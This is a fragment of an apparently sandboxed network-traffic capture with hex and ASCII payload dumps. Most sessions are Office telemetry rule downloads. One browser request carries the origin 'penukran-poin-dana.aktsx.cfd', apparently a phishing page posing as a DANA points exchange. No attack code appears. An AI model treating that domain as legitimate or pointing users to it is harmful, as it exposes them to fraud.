                                                                                                                            2024-10-06 11:50:10 UTC618INData Raw: 72 2d 73 65 63 6f 6e 64 61 72 79 29 7b 2d 2d 69 6f 6e 2d 63 6f 6c 6f 72 2d 62 61 73 65 3a 76 61 72 28 2d 2d 69 6f 6e 2d 63 6f 6c 6f 72 2d 73 65 63 6f 6e 64 61 72 79 2c 20 23 30 63 64 31 65 38 29 7d 3a 68 6f 73 74 28 2e 69 6f 6e 2d 63 6f 6c 6f 72 2d 74 65 72 74 69 61 72 79 29 7b 2d 2d 69 6f 6e 2d 63 6f 6c 6f 72 2d 62 61 73 65 3a 76 61 72 28 2d 2d 69 6f 6e 2d 63 6f 6c 6f 72 2d 74 65 72 74 69 61 72 79 2c 20 23 66 34 61 39 34 32 29 7d 3a 68 6f 73 74 28 2e 69 6f 6e 2d 63 6f 6c 6f 72 2d 73 75 63 63 65 73 73 29 7b 2d 2d 69 6f 6e 2d 63 6f 6c 6f 72 2d 62 61 73 65 3a 76 61 72 28 2d 2d 69 6f 6e 2d 63 6f 6c 6f 72 2d 73 75 63 63 65 73 73 2c 20 23 31 30 64 63 36 30 29 7d 3a 68 6f 73 74 28 2e 69 6f 6e 2d 63 6f 6c 6f 72 2d 77 61 72 6e 69 6e 67 29 7b 2d 2d 69 6f 6e 2d 63
                                                                                                                            Data Ascii: r-secondary){--ion-color-base:var(--ion-color-secondary, #0cd1e8)}:host(.ion-color-tertiary){--ion-color-base:var(--ion-color-tertiary, #f4a942)}:host(.ion-color-success){--ion-color-base:var(--ion-color-success, #10dc60)}:host(.ion-color-warning){--ion-c
                                                                                                                            2024-10-06 11:50:10 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                            Data Ascii: 0


                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                            42192.168.2.64977913.107.246.60443
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-10-06 11:50:10 UTC192OUTGET /rules/rule120610v0s19.xml HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Accept-Encoding: gzip
                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                            2024-10-06 11:50:10 UTC470INHTTP/1.1 200 OK
                                                                                                                            Date: Sun, 06 Oct 2024 11:50:10 GMT
                                                                                                                            Content-Type: text/xml
                                                                                                                            Content-Length: 474
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:46 GMT
                                                                                                                            ETag: "0x8DC582B9964B277"
                                                                                                                            x-ms-request-id: 3ea0840d-701e-0053-1012-173a0a000000
                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                            x-azure-ref: 20241006T115010Z-1657d5bbd48cpbzgkvtewk0wu0000000023g000000002dtu
                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                            X-Cache: TCP_HIT
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            2024-10-06 11:50:10 UTC474INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120610" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120609" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                            43192.168.2.64978213.107.246.60443
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-10-06 11:50:10 UTC192OUTGET /rules/rule120613v0s19.xml HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Accept-Encoding: gzip
                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                            2024-10-06 11:50:10 UTC470INHTTP/1.1 200 OK
                                                                                                                            Date: Sun, 06 Oct 2024 11:50:10 GMT
                                                                                                                            Content-Type: text/xml
                                                                                                                            Content-Length: 632
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                                                                                                            ETag: "0x8DC582BB6E3779E"
                                                                                                                            x-ms-request-id: 15158de7-401e-0029-4b00-179b43000000
                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                            x-azure-ref: 20241006T115010Z-1657d5bbd48xdq5dkwwugdpzr0000000024g00000000gw56
                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                            X-Cache: TCP_HIT
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            2024-10-06 11:50:10 UTC632INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 48 68 5d 5b 50 70 5d 28 5b 5e 45 5d 7c 24 29 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 33 22 20 52 3d 22 28 5b 48 68 5d 5b 45 65 5d 5b 57 77 5d 5b 4c 6c 5d 5b 45 65 5d
                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120613" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120611" /> <SR T="2" R="^([Hh][Pp]([^E]|$))"> <S T="1" F="1" M="Ignore" /> </SR> <SR T="3" R="([Hh][Ee][Ww][Ll][Ee]


                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                            44192.168.2.64978013.107.246.60443
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-10-06 11:50:10 UTC192OUTGET /rules/rule120612v0s19.xml HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Accept-Encoding: gzip
                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                            2024-10-06 11:50:10 UTC470INHTTP/1.1 200 OK
                                                                                                                            Date: Sun, 06 Oct 2024 11:50:10 GMT
                                                                                                                            Content-Type: text/xml
                                                                                                                            Content-Length: 471
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:25 GMT
                                                                                                                            ETag: "0x8DC582BB10C598B"
                                                                                                                            x-ms-request-id: 73fc0cc0-d01e-008e-5fee-16387a000000
                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                            x-azure-ref: 20241006T115010Z-1657d5bbd48vhs7r2p1ky7cs5w0000000270000000009zfy
                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                            X-Cache: TCP_HIT
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            2024-10-06 11:50:10 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120612" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120611" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                            45192.168.2.64978113.107.246.60443
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-10-06 11:50:10 UTC192OUTGET /rules/rule120611v0s19.xml HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Accept-Encoding: gzip
                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                            2024-10-06 11:50:10 UTC470INHTTP/1.1 200 OK
                                                                                                                            Date: Sun, 06 Oct 2024 11:50:10 GMT
                                                                                                                            Content-Type: text/xml
                                                                                                                            Content-Length: 415
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:56 GMT
                                                                                                                            ETag: "0x8DC582B9F6F3512"
                                                                                                                            x-ms-request-id: 1707b783-801e-00a3-53e5-167cfb000000
                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                            x-azure-ref: 20241006T115010Z-1657d5bbd48p2j6x2quer0q028000000022000000000bywb
                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                            X-Cache: TCP_HIT
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            2024-10-06 11:50:10 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4c 6c 5d 5b 45 65 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 56 76 5d 5b 4f 6f 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120611" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120609" /> <SR T="2" R="([Ll][Ee][Nn][Oo][Vv][Oo])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                            46192.168.2.64978313.107.246.60443
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-10-06 11:50:10 UTC192OUTGET /rules/rule120614v0s19.xml HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Accept-Encoding: gzip
                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                            2024-10-06 11:50:10 UTC470INHTTP/1.1 200 OK
                                                                                                                            Date: Sun, 06 Oct 2024 11:50:10 GMT
                                                                                                                            Content-Type: text/xml
                                                                                                                            Content-Length: 467
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:08 GMT
                                                                                                                            ETag: "0x8DC582BA6C038BC"
                                                                                                                            x-ms-request-id: 87fc294c-201e-0051-40f3-167340000000
                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                            x-azure-ref: 20241006T115010Z-1657d5bbd482lxwq1dp2t1zwkc00000001r0000000006uuq
                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                            X-Cache: TCP_HIT
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            2024-10-06 11:50:10 UTC467INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120614" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120613" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            47192.168.2.649785104.17.249.2034436220C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-10-06 11:50:11 UTC618OUTGET /ionicons@7.1.0/dist/ionicons/svg/chevron-back-outline.svg HTTP/1.1
                                                                                                                            Host: unpkg.com
                                                                                                                            Connection: keep-alive
                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                            Accept: */*
                                                                                                                            Origin: http://penukran-poin-dana.aktsx.cfd
                                                                                                                            Sec-Fetch-Site: cross-site
                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                            Referer: http://penukran-poin-dana.aktsx.cfd/
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                            2024-10-06 11:50:11 UTC551INHTTP/1.1 200 OK
                                                                                                                            Date: Sun, 06 Oct 2024 11:50:11 GMT
                                                                                                                            Content-Type: image/svg+xml
                                                                                                                            Transfer-Encoding: chunked
                                                                                                                            Connection: close
                                                                                                                            access-control-allow-origin: *
                                                                                                                            cache-control: public, max-age=31536000
                                                                                                                            last-modified: Sat, 26 Oct 1985 08:15:00 GMT
                                                                                                                            etag: W/"d3-qgAfOZqw+DN474sa0ZhgYMZOPHQ"
                                                                                                                            via: 1.1 fly.io
                                                                                                                            fly-request-id: 01HRW7JNTREHM3DMM1WNEQJ3W6-lga
                                                                                                                            CF-Cache-Status: HIT
                                                                                                                            Age: 17870951
                                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                            Server: cloudflare
                                                                                                                            CF-RAY: 8ce56eaf7b378ce9-EWR
                                                                                                                            2024-10-06 11:50:11 UTC217INData Raw: 64 33 0d 0a 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 63 6c 61 73 73 3d 22 69 6f 6e 69 63 6f 6e 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 31 32 20 35 31 32 22 3e 3c 70 61 74 68 20 73 74 72 6f 6b 65 2d 6c 69 6e 65 63 61 70 3d 22 72 6f 75 6e 64 22 20 73 74 72 6f 6b 65 2d 6c 69 6e 65 6a 6f 69 6e 3d 22 72 6f 75 6e 64 22 20 73 74 72 6f 6b 65 2d 77 69 64 74 68 3d 22 34 38 22 20 64 3d 22 4d 33 32 38 20 31 31 32 4c 31 38 34 20 32 35 36 6c 31 34 34 20 31 34 34 22 20 63 6c 61 73 73 3d 22 69 6f 6e 69 63 6f 6e 2d 66 69 6c 6c 2d 6e 6f 6e 65 22 2f 3e 3c 2f 73 76 67 3e 0d 0a
                                                                                                                            Data Ascii: d3<svg xmlns="http://www.w3.org/2000/svg" class="ionicon" viewBox="0 0 512 512"><path stroke-linecap="round" stroke-linejoin="round" stroke-width="48" d="M328 112L184 256l144 144" class="ionicon-fill-none"/></svg>
                                                                                                                            2024-10-06 11:50:11 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                            Data Ascii: 0


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            48192.168.2.649786184.28.90.27443
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-10-06 11:50:11 UTC239OUTGET /fs/windows/config.json HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Accept: */*
                                                                                                                            Accept-Encoding: identity
                                                                                                                            If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                            Range: bytes=0-2147483646
                                                                                                                            User-Agent: Microsoft BITS/7.8
                                                                                                                            Host: fs.microsoft.com
                                                                                                                            2024-10-06 11:50:11 UTC514INHTTP/1.1 200 OK
                                                                                                                            ApiVersion: Distribute 1.1
                                                                                                                            Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                                                                                            Content-Type: application/octet-stream
                                                                                                                            ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                                                                                            Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                            Server: ECAcc (lpl/EF06)
                                                                                                                            X-CID: 11
                                                                                                                            X-Ms-ApiVersion: Distribute 1.2
                                                                                                                            X-Ms-Region: prod-weu-z1
                                                                                                                            Cache-Control: public, max-age=17677
                                                                                                                            Date: Sun, 06 Oct 2024 11:50:11 GMT
                                                                                                                            Content-Length: 55
                                                                                                                            Connection: close
                                                                                                                            X-CID: 2
                                                                                                                            2024-10-06 11:50:11 UTC55INData Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d
                                                                                                                            Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}


                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                            49192.168.2.64979013.107.246.60443
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-10-06 11:50:11 UTC192OUTGET /rules/rule120618v0s19.xml HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Accept-Encoding: gzip
                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                            2024-10-06 11:50:11 UTC470INHTTP/1.1 200 OK
                                                                                                                            Date: Sun, 06 Oct 2024 11:50:11 GMT
                                                                                                                            Content-Type: text/xml
                                                                                                                            Content-Length: 486
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:30 GMT
                                                                                                                            ETag: "0x8DC582B9018290B"
                                                                                                                            x-ms-request-id: bf7deccb-401e-0064-0f0e-1754af000000
                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                            x-azure-ref: 20241006T115011Z-1657d5bbd48wd55zet5pcra0cg00000001z0000000004ef5
                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                            X-Cache: TCP_HIT
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            2024-10-06 11:50:11 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120618" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120617" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                            50192.168.2.64978913.107.246.60443
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-10-06 11:50:11 UTC192OUTGET /rules/rule120617v0s19.xml HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Accept-Encoding: gzip
                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                            2024-10-06 11:50:11 UTC470INHTTP/1.1 200 OK
                                                                                                                            Date: Sun, 06 Oct 2024 11:50:11 GMT
                                                                                                                            Content-Type: text/xml
                                                                                                                            Content-Length: 427
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:02 GMT
                                                                                                                            ETag: "0x8DC582BA310DA18"
                                                                                                                            x-ms-request-id: 915c1ee4-001e-0079-3000-1712e8000000
                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                            x-azure-ref: 20241006T115011Z-1657d5bbd48tqvfc1ysmtbdrg000000001ug000000006gq9
                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                            X-Cache: TCP_HIT
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            2024-10-06 11:50:11 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 5b 53 73 5d 5b 4f 6f 5d 5b 46 66 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120617" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120615" /> <SR T="2" R="([Mm][Ii][Cc][Rr][Oo][Ss][Oo][Ff][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                            51192.168.2.64978813.107.246.60443
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-10-06 11:50:11 UTC192OUTGET /rules/rule120615v0s19.xml HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Accept-Encoding: gzip
                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                            2024-10-06 11:50:11 UTC470INHTTP/1.1 200 OK
                                                                                                                            Date: Sun, 06 Oct 2024 11:50:11 GMT
                                                                                                                            Content-Type: text/xml
                                                                                                                            Content-Length: 407
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:42 GMT
                                                                                                                            ETag: "0x8DC582BBAD04B7B"
                                                                                                                            x-ms-request-id: 789c8418-601e-0032-5905-17eebb000000
                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                            x-azure-ref: 20241006T115011Z-1657d5bbd48tnj6wmberkg2xy800000002300000000037ba
                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                            X-Cache: TCP_HIT
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            2024-10-06 11:50:11 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 53 73 5d 5b 55 75 5d 5b 53 73 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
